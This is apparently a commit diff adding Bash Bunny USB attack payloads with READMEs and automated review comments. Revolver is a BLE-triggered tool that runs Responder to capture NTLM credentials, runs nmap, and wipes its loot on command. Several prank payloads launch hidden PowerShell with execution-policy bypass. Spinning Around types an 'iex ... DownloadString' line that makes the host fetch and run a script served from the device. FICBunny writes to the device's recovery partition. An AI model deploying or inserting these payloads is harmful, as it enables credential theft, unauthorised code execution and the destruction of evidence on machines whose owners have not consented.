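+tar --transform 's,^,/rootfs/,S' -cvf /tmp/cachedisk/upgrade/cherry.rootfs.tar media/ mnt/ proc/ sys/ tmp/ /boot/ /home/ /opt/ /srv/ /dev/pts /dev/shm/ /dev/fd/ /dev/ptmx /dev/stderr /dev/stdin /dev/stdout /dev/full /dev/null /dev/random /dev/urandom /dev/zero /dev/tty /root/ /run/ /etc/ /sbin/ /bin/ /lib/ /var/ /usr/ &> /tmp/massdisk/loot/recscript/RootFS_EX_errors.txt > /tmp/massdisk/loot/recscript/RootFS_EX_output.txt
+# Tar all filesystem resources to rootfs.tar in upgrade folder
+md5sum /tmp/cachedisk/upgrade/cherry.rootfs.tar > /tmp/cachedisk/upgrade/cherry.rootfs.tar.md5 # Calculate MD5, save to upgrade folder.
+# TAR image extraction is complete.
+
+###########
+# STAGE 3 #
+###########
+# Compile firmware file.
+LED STAGE3
+sleep 1 # Script may be quicker than LED blinking, so let's delay by one second for user interface.
+# Now complie the tar.gz to /tmp/massdisk/
+cd /tmp/cachedisk/ # Need to move to cache disk, otherwise files would be located at /tmp/cachedisk/upgrade, not what we want!
+tar -czvf "/tmp/massdisk/loot/recscript/ch_fw_`cat /root/version.txt`.tar.gz" upgrade &> /tmp/massdisk/loot/recscript/Firmware_Com_errors.txt > /tmp/massdisk/loot/recscript/Firmware_Com_output.txt
+cd /tmp/rootexfs # Move back to orignal directory.
+# Image compliation completed.
+
+###########
+# STAGE 4 #
+###########
+# Check if firmware file exists in recdisk. If not, copy generated firmware file to recdisk.
+LED STAGE4
+sleep 1 # Script may be quicker than LED blinking, so let's delay by one second for user interface.
+# Let's check if an image already exists in the recdisk.
+startString="ch_fw_"
+entry=`ls /tmp/recdisk/root/ | while read line; do echo ${line} | grep "^$startString.*.tar.gz$";done | head -n 1`
+NeedToWriteFirmWareImage=0
+if [ "$entry" = "" ]; then
+LED R SOLID # Indicate that a firmware image was missing.
+sleep 1
+NeedToWriteFirmWareImage=1
+else
+LED C QUAD # An existing firmware image was found.
+sleep 1
+if [ $Overwrite -eq 1 ]; then
+NeedToWriteFirmWareImage=1
+fi
+fi
+if [ $NeedToWriteFirmWareImage -eq 1 ] && [ $WriteToRecovery -eq 1 ]; then
+LED M VERYFAST # Copying firmware image from massdisk to recovery disk.
+cp /tmp/massdisk/loot/recscript/ch_fw*.tar.gz /tmp/recdisk/root/
+sync # Just in case.
+fi
+
+###########
+# CLEANUP #
+###########
+LED CLEANUP
+sleep 1 # Script may be quicker than LED blinking, so let's delay by one second for user interface.
+# Removing a bunch of directories.
+rm -R /tmp/cachedisk/*
+sync
+umount /tmp/cachedisk
+umount /tmp/massdisk
+umount /tmp/recdisk
+rmdir /tmp/cachedisk
+rmdir /tmp/massdisk
+rmdir /tmp/recdisk
+rm -R /tmp/rootexfs
+
+##########
+# FINISH #
+##########
+LED FINISH
+sleep 1
+# End of the script will swap to LED BLUE SLOW and activate our storage.
+LED B SLOW
+ATTACKMODE SERIAL STORAGE
+exit 0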
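Review bot: STAGE 4 copies `ch_fw*.tar.gz` onto the recovery partition without confirming that STAGE 3 produced a good archive — the `tar -czvf` exit status is discarded (only its output is redirected to files) and the `.md5` files written in STAGE 1 and STAGE 2 are never compared against anything — so a failed or truncated tar still replaces the recovery image when `WriteToRecovery=1`, which the README singles out as the step that must not go wrong. Capture the status on the STAGE 3 tar line, e.g. append `|| { LED FAIL; exit 1; }` after its redirections, so the `LED M VERYFAST` block is only reached with a complete archive. The `mount` calls in SETUP are likewise unchecked, and the `exit 1` after `LED FAIL` returns with `/root/udisk` still mounted. In the `entry=` lookup the pattern `"^$startString.*.tar.gz$"` has unescaped dots; `"^${startString}.*\.tar\.gz$"` is what was meant.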
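--- /dev/null
+++ b/[path-not-on-page]/README.md
@@ -0,0 +1,38 @@
+## FICBunny
+
+* Title: FICBunny
+* Short Description: Firmware Image Creator for the Bash Bunny
+* Author: HSF3232 (@Hacksawfred3232)
+* Contributer: Austin Spraggins (@spragginsdesigns)
+* Version: 1.0
+* Last tested Bunny Firmware version: 1.7
+
+## Long Description
+
+The primary purpose of this script is to create a backup image (in case you want to revert to a known good point). Then replace the missing firmware image within /dev/nandg, should it be missing.
+
+Note: It may be a good idea to disable non-critical services - if any - on the bunny before starting this payload.
+
+**WARNING: /dev/nandg CONTAINS RECOVERY RELATED FILES! WHILE I HAVE TESTED THIS SCRIPT MANY TIMES TO ENSURE IT DOESN'T DO ANYTHING SCREWEY, YOU NORMALLY SHOULD NOT TOUCH /dev/nandg! IF YOU DON'T WANT TO MESS WITH THE RECOVERY PARTITION, TURN OFF "WriteToRecovery"!!**
+
+## Variables
+| Name | Description | Default |
+| --------------- | --------------------------------------------------------------------------------- | ------- |
+| WriteToRecovery | When firmware image extraction is complete, write the firmware image to recovery? | 1 |
+| Overwrite | If an existing firmware file is detected within recovery, overwrite it? | 0 |
+
+## STATUS
+
+| LED | Status |
+| ----------------------- | ------------------------------------------------------------------------------------------------------------- |
+| SETUP | Copying required script file to /tmp, creating needed directories, and mounting partitions |
+| FAIL | Couldn't find the file of script needed within payload directory |
+| STAGE 1 | Extracting uImage file |
+| STAGE 2 | Copying rootFS into rootfs.tar |
+| STAGE 3 | Compile the firmware file from rootfs.tar and uImage into a file on MassDisk |
+| STAGE 4 | Looking in Recovery partition for backup firmware image |
+| R SOLID | Backup firmware image missing! If told to, will copy generated backup firmware image into recovery. |
+| C QUAD | Backup firmware image found! If told to, script will overwrite it. |
+| M VERYFAST | Writing to recovery partition, **DO NOT UNPLUG!!!!** |
+| CLEANUP | Removing temporary directories and unmounting partitions |
+| FINISH | Script is finished, starting arming mode (ATTACKMODE SERIAL STORAGE) |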
@ -0,0 +1,261 @@
|
|||
# Title: Revolver
|
||||
# Description: Multiple network attacks and modes based on BLE beacons
|
||||
# Author: saintcrossbow
|
||||
# Props: Hak5Darren (BLE, QuickCreds, nmap)
|
||||
# Version: 1.0
|
||||
# Category: General
|
||||
# Target: Windows 10 with minimum powershell usage
|
||||
# Attackmodes: All
|
||||
|
||||
# Full Description
|
||||
# ----------------
|
||||
# This payload was made in the style of Q Branch: those that use this need to know they have
|
||||
# multiple options for attack as well as getting out of a bad situation. Switching into this
|
||||
# payload will place the Bash Bunny in a command waiting mode. BLE beacons are sent to start
|
||||
# attacks, including QuickCreds and nmap. A loot self-destruct option is also available. The
|
||||
# payload is easily extendable to include any attack you might need in the field.
|
||||
#
|
||||
# Note other payloads were co-opted into this multimode attack, and to make it easy I used
|
||||
# Hak5Darren's code, partially because I imagine he wants to see these payloads extended,
|
||||
# and also because I know he appreciates Q Branch.
|
||||
|
||||
# Configuring
|
||||
# -----------
|
||||
# Change the BLE beacon commands listed in Options below to something unique to you. Definitely
|
||||
# do not want someone else activating your Bash Bunny. Also verify the responder and nmap
|
||||
# options are to your liking.
|
||||
|
||||
# Usage
|
||||
# -----
|
||||
# Plug in to get into command waiting mode (slow white LED). Launch attacks by sending the
|
||||
# right BLE beacon. Make sure to stop the beacon after the attack so you won't go into a loop.
|
||||
|
||||
# LEDs
|
||||
# ----
|
||||
# Slow white LED: Awaiting BLE commands
|
||||
# Yellow: Attack in progress
|
||||
# Red: Self destruct of loot
|
||||
# Blue solid: USB mode
|
||||
# Cyan solid: Ethernet mode
|
||||
|
||||
# Options
|
||||
# -------
|
||||
REQUIRETOOL responder
|
||||
|
||||
# BLE beacon options - change to your preferences. Make sure to use things
|
||||
# you'll not encounter since you don't want to start a self-destruct sequence
|
||||
# on accident
|
||||
ABORT_MISSION="QSTOP"
|
||||
START_QUICKCREDS_WIN="QCREDS"
|
||||
START_QUICKCREDS_NIX="QCREDNIX"
|
||||
START_NMAP="QNMAP"
|
||||
START_USB="QLOOT"
|
||||
START_ETHER="QETHER"
|
||||
START_DEL_LOOT="QSELFD"
|
||||
|
||||
# Responder options
|
||||
RESPONDER_OPTIONS="-w -r -d P"
|
||||
RESPONDER_LOOTDIR=/root/udisk/loot/quickcreds
|
||||
# Nmap options
|
||||
NMAP_OPTIONS = "-sS -O -sV -F -oA"
|
||||
NMAP_LOOTDIR=/root/udisk/loot/nmap
|
||||
|
||||
# Setup
|
||||
# -----
|
||||
LED SETUP
|
||||
|
||||
|
||||
# Responder
|
||||
# ---------
|
||||
# Note: This is a modified version of quick creds
|
||||
# Original by Hak5Darren
|
||||
# ---------
|
||||
startResponder()
|
||||
{
|
||||
CUCUMBER DISABLE
|
||||
# Set convenience variables
|
||||
GET TARGET_HOSTNAME
|
||||
GET TARGET_IP
|
||||
|
||||
# Setup named logs in loot directory
|
||||
mkdir -p $RESPONDER_LOOTDIR
|
||||
HOST=${TARGET_HOSTNAME}
|
||||
# If hostname is blank set it to "noname"
|
||||
[[ -z "$HOST" ]] && HOST="noname"
|
||||
COUNT=$(ls -lad $RESPONDER_LOOTDIR/$HOST* | wc -l)
|
||||
COUNT=$((COUNT+1))
|
||||
mkdir -p $RESPONDER_LOOTDIR/$HOST-$COUNT
|
||||
|
||||
# As a backup also copy logs to a loot directory in /root/loot/
|
||||
mkdir -p /root/loot/quickcreds/$HOST-$COUNT
|
||||
|
||||
# Check target IP address. If unset, blink RED and end.
|
||||
if [ -z "${TARGET_IP}" ]; then
|
||||
LED FAIL2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Set LED yellow, run attack
|
||||
LED ATTACK
|
||||
cd /tools/responder
|
||||
|
||||
# Clean logs directory
|
||||
rm logs/*
|
||||
|
||||
# Run Responder with specified options
|
||||
python Responder.py -I usb0 $RESPONDER_OPTIONS &
|
||||
|
||||
# Wait until NTLM log is found
|
||||
until [ -f logs/*NTLM* ]
|
||||
do
|
||||
# Ima just loop here until NTLM logs are found
|
||||
sleep 1
|
||||
done
|
||||
|
||||
# copy logs to loot directory
|
||||
cp logs/* /root/loot/quickcreds/$HOST-$COUNT
|
||||
cp logs/* $RESPONDER_LOOTDIR/$HOST-$COUNT
|
||||
|
||||
# Sync USB disk filesystem
|
||||
sync
|
||||
LED FINISH
|
||||
Q DELAY 1500
|
||||
|
||||
# Return to waiting mode
|
||||
CUCUMBER ENABLE
|
||||
LED W SLOW
|
||||
}
|
||||
|
||||
# Nmap
|
||||
# ----
|
||||
# Note: This is a modified version of one of the very first payloads, nmap
|
||||
# Original by Hak5Darren
|
||||
# ----
|
||||
startNmap()
|
||||
{
|
||||
CUCUMBER DISABLE
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
|
||||
GET TARGET_HOSTNAME
|
||||
GET TARGET_IP
|
||||
|
||||
# Setup named logs in loot directory
|
||||
mkdir -p $NMAP_LOOTDIR
|
||||
HOST=${TARGET_HOSTNAME}
|
||||
# If hostname is blank set it to "noname"
|
||||
[[ -z "$HOST" ]] && HOST="noname"
|
||||
COUNT=$(ls -lad $NMAP_LOOTDIR/$HOST*.log | wc -l)
|
||||
COUNT=$((COUNT+1))
|
||||
|
||||
if [ -z ""${TARGET_IP} ]; then
|
||||
LED FAIL
|
||||
Q DELAY 1500
|
||||
else
|
||||
LED ATTACK
|
||||
nmap $NMAP_OPTIONS $TARGET_IP >> $NMAP_LOOTDIR/$HOST-$COUNT.log
|
||||
sync
|
||||
LED FINISH
|
||||
Q DELAY 1500
|
||||
fi
|
||||
|
||||
# Return to waiting mode
|
||||
CUCUMBER ENABLE
|
||||
LED W SLOW
|
||||
}
|
||||
|
||||
startLoot()
|
||||
{
|
||||
CUCUMBER DISABLE
|
||||
# We are going for solid LED this time in case the device needs to be played off as normal USB
|
||||
# ... and best of luck to you on that!
|
||||
LED B SOLID
|
||||
ATTACKMODE STORAGE
|
||||
}
|
||||
|
||||
# For sharing, getting on via putty, or exiting USB mode
|
||||
startEthernet()
|
||||
{
|
||||
CUCUMBER DISABLE
|
||||
LED C SOLID
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
}
|
||||
|
||||
|
||||
# Delete everything in loot directory
|
||||
# Depending on your engagement, could also delete switch and library - but be careful!
|
||||
# Switches to HID to ensure it is not in USB mode or possibly timing out in Ethernet. Going plaid
|
||||
# to delete those files
|
||||
startSelfDestruct()
|
||||
{
|
||||
ATTACKMODE HID
|
||||
CUCUMBER PLAID
|
||||
LED R SOLID
|
||||
rm -r /root/udisk/loot
|
||||
rm -r /root/loot/
|
||||
sync
|
||||
shutdown now
|
||||
}
|
||||
|
||||
# Main
|
||||
# ----
|
||||
# Start bluetooth for observation
|
||||
source bunny_helpers.sh
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
sleep 1
|
||||
echo -n -e "AT+ROLE=2" > /dev/ttyS1
|
||||
echo -n -e "AT+RESET" > /dev/ttyS1
|
||||
|
||||
# Wait for BLE
|
||||
CUCUMBER ENABLE
|
||||
LED W SLOW
|
||||
|
||||
while :
|
||||
do
|
||||
timeout 1s cat /dev/ttyS1 > /tmp/bt_observation
|
||||
|
||||
# Shutdown
|
||||
if grep -ao $ABORT_MISSION /tmp/bt_observation; then
|
||||
sync
|
||||
LED FINISH
|
||||
Q DELAY 1500
|
||||
shutdown now
|
||||
fi
|
||||
|
||||
# Responder - Windows
|
||||
if grep -ao $START_QUICKCREDS_WIN /tmp/bt_observation; then
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
startResponder
|
||||
fi
|
||||
|
||||
# Responder - *nix or mac
|
||||
if grep -ao $START_QUICKCREDS_NIX /tmp/bt_observation; then
|
||||
ATTACKMODE ECM_ETHERNET
|
||||
startResponder
|
||||
fi
|
||||
|
||||
# Start nmap against host
|
||||
if grep -ao $START_NMAP /tmp/bt_observation; then
|
||||
startNmap
|
||||
fi
|
||||
|
||||
# Open as USB device
|
||||
if grep -ao $START_USB /tmp/bt_observation; then
|
||||
startLoot
|
||||
fi
|
||||
|
||||
# Open as Ethernet device
|
||||
if grep -ao $START_ETHER /tmp/bt_observation; then
|
||||
startEthernet
|
||||
fi
|
||||
|
||||
# Limited self-destruct of loot
|
||||
if grep -ao $START_DEL_LOOT /tmp/bt_observation; then
|
||||
startSelfDestruct
|
||||
# Leave the scene after the delete
|
||||
break
|
||||
fi
|
||||
|
||||
done
|
||||
|
||||
sync
|
|
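Review bot: `NMAP_OPTIONS = "-sS -O -sV -F -oA"` in the Options block has spaces around `=`, so bash treats it as a command named NMAP_OPTIONS instead of an assignment; the variable stays empty and startNmap ends up running nmap with default options. Even with the assignment fixed, `-oA` takes an output basename, so the next word on the nmap line, `$TARGET_IP`, would be consumed as that basename and nmap would be given no target while stdout is already redirected to the `.log` file; `NMAP_OPTIONS="-sS -O -sV -F"` is what that redirect actually wants. In startNmap the check `if [ -z ""${TARGET_IP} ]; then` leaves the expansion unquoted, unlike the `"${TARGET_IP}"` test in startResponder; `if [ -z "${TARGET_IP}" ]; then` keeps the two consistent. The beacon tests such as `grep -ao $ABORT_MISSION /tmp/bt_observation` are substring matches on unquoted patterns, so `QSTOP` also fires on any longer token that contains it; `grep -aoF -- "$ABORT_MISSION" /tmp/bt_observation` (and likewise for the other triggers) matches the literal token only. The two `stty -F /dev/ttyS1 ...` lines under Main are identical and one can be dropped.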
@ -0,0 +1,25 @@
|
|||
## Revolver
|
||||
|
||||
|
||||
This payload was made in the style of Q Branch: it provides multiple options for attack and getting out of bad situations. Switching into this payload will place the Bash Bunny in a command waiting mode. BLE beacons are sent to start attacks, including QuickCreds and nmap. A loot self-destruct option is also available. The payload is easily extendable to include any attack you might need in the field.
|
||||
|
||||
Note other payloads were co-opted into this multimode attack, and to make it easy
|
||||
I used Hak5Darren's code, partially because I imagine he wants to see these payloads
|
||||
extended, and also because I know he appreciates Q Branch.
|
||||
|
||||
**Features**
|
||||
- Once active, the Bash Bunny blinks a white LED indicating it is waiting for BLE beacons
|
||||
- Commands may be issued to start classic payloads (nmap, quickcreds), switch modes (USB storage or Ethernet), shutdown for removal, or initiate a loot self-destruct
|
||||
- After attacks are complete, Bash Bunny returns to a waiting state for more commands (except for self destruct and shut down)
|
||||
|
||||
**Payload Configuration**
|
||||
1. Change the BLE beacons in the *Options* section. Don't leave in defaults - you don't want someone else to control your Bash Bunny!
|
||||
2. Verify the responder and nmap options are to your liking
|
||||
|
||||
**LED meanings**
|
||||
- Slow 1 second white on and off: Awaiting commands
|
||||
- Single yellow blink: Attack in progress
|
||||
- Green rapid flash, then solid: Attack complete
|
||||
- Solid red: Loot self-destruct - complete and ready to remove when off
|
||||
- Solid blue: USB mode
|
||||
- Solid cyan: Ethernet mode
|
|
@ -0,0 +1,20 @@
|
|||
# Title: Excel QR Rickroll
|
||||
# Description: Create a QR code in Excel that points to Rick Astley - Never Gonna Give You Up on YouTube
|
||||
# Author: Cribbit
|
||||
# Version: 1.0
|
||||
# Category: Pranks
|
||||
# Target: Windows (Powershell 5.1+)
|
||||
# Attackmodes: HID & STORAGE
|
||||
# Extensions: Run
|
||||
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED ATTACK
|
||||
|
||||
RUN WIN "powerShell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\QRcode.ps1')"
|
||||
|
||||
LED FINNISH
|
|
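Review bot: The closing `LED FINNISH` is misspelled; the other payloads in this commit use `LED FINISH`, and this payload's README documents a FINISH state (green blink then solid), so the final pattern presumably does not display as intended — `LED FINISH`. The same misspelling is on the last line of the Replace Cursor payload later in this commit. The README for this payload also lists `Attackmode: HID` while the payload runs `ATTACKMODE HID STORAGE`; one of the two should be brought in line with the other.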
@ -0,0 +1,22 @@
|
|||
# Excel QR Rickroll
|
||||
* Author: Cribbit
|
||||
* Version: 1.0
|
||||
* Target: Windows (Powershell 5.1+) + Excel
|
||||
* Category: pranks
|
||||
* Attackmode: HID
|
||||
* Extensions: Run
|
||||
|
||||
## Change Log
|
||||
| Version | Changes |
|
||||
| ------- | ------------------------------|
|
||||
| 1.0 | Initial release |
|
||||
|
||||
## Description
|
||||
Create a QR code in Excel that points to Rick Astley - Never Gonna Give You Up on YouTube
|
||||
|
||||
## Colors
|
||||
| Status | Color | Description |
|
||||
| --------- | ------------------------------| ------------------------------------------------ |
|
||||
| SETUP | Magenta solid | Setting attack mode, getting the switch position |
|
||||
| ATTACK | Yellow single blink | Injecting Powershell script |
|
||||
| FINISH | Green blink followed by SOLID | Script is finished |
|
|
@ -0,0 +1,20 @@
|
|||
# Title: Replace Cursor
|
||||
# Description: Replaces the standard arrow with a little bash bunny.
|
||||
# Author: Cribbit
|
||||
# Version: 1.0
|
||||
# Category: Pranks
|
||||
# Target: Windows (Powershell 5.1+)
|
||||
# Attackmodes: HID & STORAGE
|
||||
# Extensions: Run
|
||||
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED ATTACK
|
||||
|
||||
RUN WIN "powershell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ps.ps1')"
|
||||
|
||||
LED FINNISH
|
|
@ -0,0 +1,15 @@
|
|||
# Copies the bunny ani file to the users profile.
|
||||
$p=(gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\b.ani'
|
||||
$f= $Env:USERPROFILE+'\b.ani'
|
||||
if (Test-Path $p)
|
||||
{
|
||||
cp $p $f
|
||||
}
|
||||
else
|
||||
{
|
||||
cp ($p -replace "1", "2") $f
|
||||
}
|
||||
# Set the registory value of Arrow to the new cursor
|
||||
sp 'HKCU:Control Panel\Cursors' Arrow '%USERPROFILE%\b.ani';
|
||||
# Tell the system to update the displayed cursor
|
||||
(Add-Type -Name c -Pass -M '[DllImport("user32.dll")] public static extern bool SystemParametersInfo(int A,int b,int c,int d);')::SystemParametersInfo(87,0,0,3)
|
|
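Review bot: The source path `$p=(gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\b.ani'` hard-codes switch1, and the fallback `cp ($p -replace "1", "2") $f` rewrites every `1` in the path rather than just the switch number, so the script only works for a two-switch layout and guesses the wrong file if the volume path ever contains a `1`. The launching payload already has `$SWITCH_POSITION` and could pass it in, e.g. `param($sw)` at the top and `'payloads\'+$sw+'\b.ani'` in place of the hard-coded segment, which removes the `-replace` branch entirely. Neither copy is checked before `sp 'HKCU:Control Panel\Cursors' Arrow '%USERPROFILE%\b.ani'` runs, so if no `b.ani` was found the Arrow value still ends up pointing at a missing file. That value also relies on `%USERPROFILE%` being expanded, which only happens for an expand-string registry value; if Arrow were absent the cmdlet would create a plain string, so adding `-Type ExpandString` to the `sp` call is worth considering. The comment `# Set the registory value of Arrow` should read `registry`.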
@ -0,0 +1,47 @@
|
|||
# Replace Cursor
|
||||
- Author: Cribbit
|
||||
- Version: 1.0
|
||||
- Target: Windows 10 (Powershell 5.1+)
|
||||
- Category: Pranks
|
||||
- Attackmode: HID & Storage
|
||||
- Extensions: Run
|
||||
- Props: The Hak5 Team (Wallpaper changer & Eject USB sound)
|
||||
|
||||
## Change Log
|
||||
| Version | Changes |
|
||||
| ------- | --------------- |
|
||||
| 1.0 | Initial release |
|
||||
|
||||
## Description
|
||||
Replaces the standard arrow with a little bash bunny icon.
|
||||
|
||||
## Notes
|
||||
I have included a both a static and animated cursor.
|
||||
|
||||
## Information about SystemParametersInfo
|
||||
### Microsoft Doc:
|
||||
|
||||
https://docs.microsoft.com/en-gb/windows/win32/api/winuser/nf-winuser-systemparametersinfoa
|
||||
|
||||
### Flags
|
||||
|
||||
```
|
||||
SPI_SETCURSORS = 0x0057;
|
||||
```
|
||||
|
||||
Convert uint to int = 87;
|
||||
|
||||
```
|
||||
SPIF_UPDATEINIFILE = 0x01;
|
||||
SPIF_SENDCHANGE = 0x02;
|
||||
```
|
||||
|
||||
Bitwise "OR" these two together (0x01 -bor 0x02) = 3;
|
||||
|
||||
|
||||
## Colours
|
||||
| Status | Colour | Description |
|
||||
| ------ | ----------------------------- | --------------------------- |
|
||||
| SETUP | Magenta solid | Setting attack mode |
|
||||
| ATTACK | Yellow single blink | Injecting Powershell script |
|
||||
| FINISH | Green blink followed by SOLID | Script is finished |
|
|
@ -0,0 +1,39 @@
|
|||
#!/bin/bash
|
||||
# Title: Spinning Around
|
||||
# Description: Spinning Ascii Hak5 Logo
|
||||
# Author: Cribbit
|
||||
# Version: 1.0
|
||||
# Category: Pranks
|
||||
# Target: Windows (Powershell 5.1+)
|
||||
# Attackmodes: RNDIS_ETHERNET HID
|
||||
# Props: TW-D - inspiration, audibleblink - python server
|
||||
# Super mad Prop: Lee Holmes - Powershell Rickroll iex (New-Object Net.WebClient).DownloadString(“http://bit.ly/e0Mw9w")
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE RNDIS_ETHERNET HID
|
||||
|
||||
GET SWITCH_POSITION
|
||||
GET HOST_IP
|
||||
|
||||
|
||||
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||
|
||||
# starting server
|
||||
LED SPECIAL
|
||||
|
||||
# disallow outgoing dns requests so server starts immediately
|
||||
iptables -A OUTPUT -p udp --dport 53 -j DROP
|
||||
python -m SimpleHTTPServer 80 &
|
||||
|
||||
# wait until port is listening
|
||||
while ! nc -z localhost 80; do sleep 0.2; done
|
||||
|
||||
# attack commences
|
||||
LED ATTACK
|
||||
QUACK DELAY 200
|
||||
RUN WIN Powershell
|
||||
QUACK DELAY 500
|
||||
QUACK STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/spin\")"
|
||||
QUACK ENTER
|
||||
LED FINISH
|
||||
|
|
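Review bot: The rule added by `iptables -A OUTPUT -p udp --dport 53 -j DROP` is never removed, so outbound DNS from the Bunny stays blocked after the payload finishes and every run appends another copy of the same rule. Guarding the insert, `iptables -C OUTPUT -p udp --dport 53 -j DROP 2>/dev/null || iptables -A OUTPUT -p udp --dport 53 -j DROP`, stops the duplicates, and a matching `iptables -D OUTPUT -p udp --dport 53 -j DROP` belongs at the end of the payload; since the comment says the rule exists only so the server starts quickly, it could be deleted as soon as the `nc -z localhost 80` wait succeeds rather than after the injection. The `python -m SimpleHTTPServer 80 &` process is likewise left running with no pid recorded; `SERVER_PID=$!` on the next line would allow a later `kill "$SERVER_PID"`. Note that the server publishes the whole `payloads/$SWITCH_POSITION/` directory to the host, not just the `spin` file, because of the preceding `cd`.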
@ -0,0 +1,28 @@
|
|||
# Spinning Around
|
||||
- Author: Cribbit
|
||||
- Version: 1.0
|
||||
- Target: Windows (Powershell 5.1+)
|
||||
- Category: Pranks
|
||||
- Attackmode: HID & RNDIS_ETHERNET
|
||||
- Extensions: Run
|
||||
|
||||
## Change Log
|
||||
| Version | Changes |
|
||||
| ------- | --------------- |
|
||||
| 1.0 | Initial release |
|
||||
|
||||
## Description
|
||||
Spinning Ascii Hak5 Logo in a powershell window\
|
||||
![Demo](demo.gif)
|
||||
|
||||
## Props
|
||||
To TW-D for the inspiration, audibleblink for python server code "execution/ShellExec/payload.txt" and
|
||||
Super mad props to Lee Holmes for Powershell Rickroll for the animation code.
|
||||
https://www.leeholmes.com/powershell-and-html5/
|
||||
|
||||
## Colours
|
||||
| Status | Colour | Description |
|
||||
| -------- | ----------------------------- | --------------------------- |
|
||||
| SETUP | Magenta solid | Setting attack mode |
|
||||
| ATTACK | Yellow single blink | Injecting Powershell script |
|
||||
| FINISHED | Green blink followed by SOLID | Injection finished |
|
|
@ -0,0 +1,71 @@
|
|||
|
||||
$frames = @(
|
||||
" # # # # # ;;iii; ,::::, ..,. # # :MX,:,M 0ii;2r MMMMMMMMMMMMMMMMMr # # SX.,.iW B7 ,i; 0MM@BWWWMMMMMMMMMM # # a.., 0Z r...: .... . ..MMM8a8880r,:iiiii, # # X.,, ZX .:, 2Z .;. XM722r, .MM7Si,MMMr :ZZZZZZ0, # # r.,,...,:;;::,..i. iM2 ..:r rMM iMMZ X0ZZZ8Z0MMMMMMM0 # # ,,,, ;a7;,.,.,,: ,Mr .S .r ;MB :8 ,8MB88808Z000BBBBWMX # # i,,.8;77,i.;2.,,:iMX 8M. ; XMZ SMM0000ZZMMM0Z8880M: # # 2S.,.M: X7 ,.;Ma SMMr ,.WMr .MB , MMMMaZZZZB0 # # ,2 ,. M Zr.,.0W .;i. ...MM iMMB 7SZaX:SMMMZZZZZ8@i # # r;.,.:Z @Z..i0. ;i: ;Z,. MM , @M2ZM@MMMWMMM02ZZZZWS # # r;:;.2: S,:,iZ ;r ,MX,,82.;X 2MMB000088MM@aaZZZBa # # .:i;:. ... .. MMMMMMZZ888ZBMMZaZZ8W2 # # .ZaS8MB0008ZZ8ZZ80BWr # # .XZ88BB88000Zr # # # # # # # "
|
||||
" # # # # # 7MMMMSXX2r X2ZWai7X7. # # ,MMMM87i;7: SMMMM8:;2Z. BMMMMM@@WWB0BBZ2 # # ZMMM2 :ii7 MMMMM::i7 rMMMMMMMMMMMMMMMM # # WMMMr ii;a SMMMM:.ii: .. . :MMMMMW80BB77XX;7: # # MMMMi.iiiX, MMMM@;,,8MMMMS820MMMM22MMM; S08800 # # MMMM:,iii;7, .:i,SMMMa,i:2MMM0 :M@. Z0888BMMMMM7 # # WMMM ,iiiir7. ,:i,iMMX iS..MMM2 .S ZMB8888WBBWWM@ # # aMMM,:iiSrXMM@88X:i.7MZ WM aMM7 . :MM808B@M@800M2 # # ;MMMM7,i7r MMMMM,:i 0M XMM: iMM: WM. ZMMMMMBZ80M, # # MMMM;.iiri MMMMB ::,Mr .::,.. MM. MMZ 2ZM@BWMWZ88W8 # # ,MMM8 ,iir, .MMMMW7,,28.:S8SX;, 0@ MMMZ@W8ZaWM0Z80M. # # iMMMZ :ii; XMMMMS:i:2X:SWMMMM:iZa,7MMMM888Z0MWZ88@X # # iMMMa,7XXi .iSB::i,7;, MMMMMM8WB8808BW880@S # # ,. ,,. :ZMWBMMW@WWBBW@Br # # ,iiXXXi: # # # # # # # "
|
||||
" # # # ,,,;rrX;:. # # SMMMMMMMMMMZ8@MMMM@Sa2 # # MMMMMMMMMB2X7WMMMMMXZ0 i@BBBBBM0ZaSX: # # MMMMMM@MMSi7rWMMMMMXXX MMMMMMMMMMMMMM # # .MM@@@@W@MX;r7MMMMMZiX; 7MMMMMMMWWB7XZi # # ;MM@@@@@MM7r7;BWW@M8;2MMM0ZMMWXWMXSBW8 # # iMM@@@@@MM;r7;i,:i;rrXMMWr;BM0 BZ aBBWMMM # # iMM@@@@@M@;r7;iri,irr;MMiXi2MB,Xi8@0B@@MM # # MM@@@@@M@ir7SZMM8ZX;rM2:MrrM0:ii@MBWMW@M # # iMM@@@@@MMX;XMMMMMM;;SMi2MXiMZ7M:XMMM@0M8 # # MM@@@@@@M0rrr@MMMM0iiZ8:7X;:MaXMS2WB@W0Mr # # ;MM@@@@@@Mr;r;MM@@MBr;BX;a27,0XXMM088@BBM # # 2MM@@@@@M@;rrrMMMMM8r787@MMMiZX8MM00BM0MX # # BMMMMMMMMW;rrS@MMMMS7XSiMMMMMMMMBB0BBW@@ # # rZ88W@MMMM7aa S@@MMMMMMM@W8 # # # # # # # # # "
|
||||
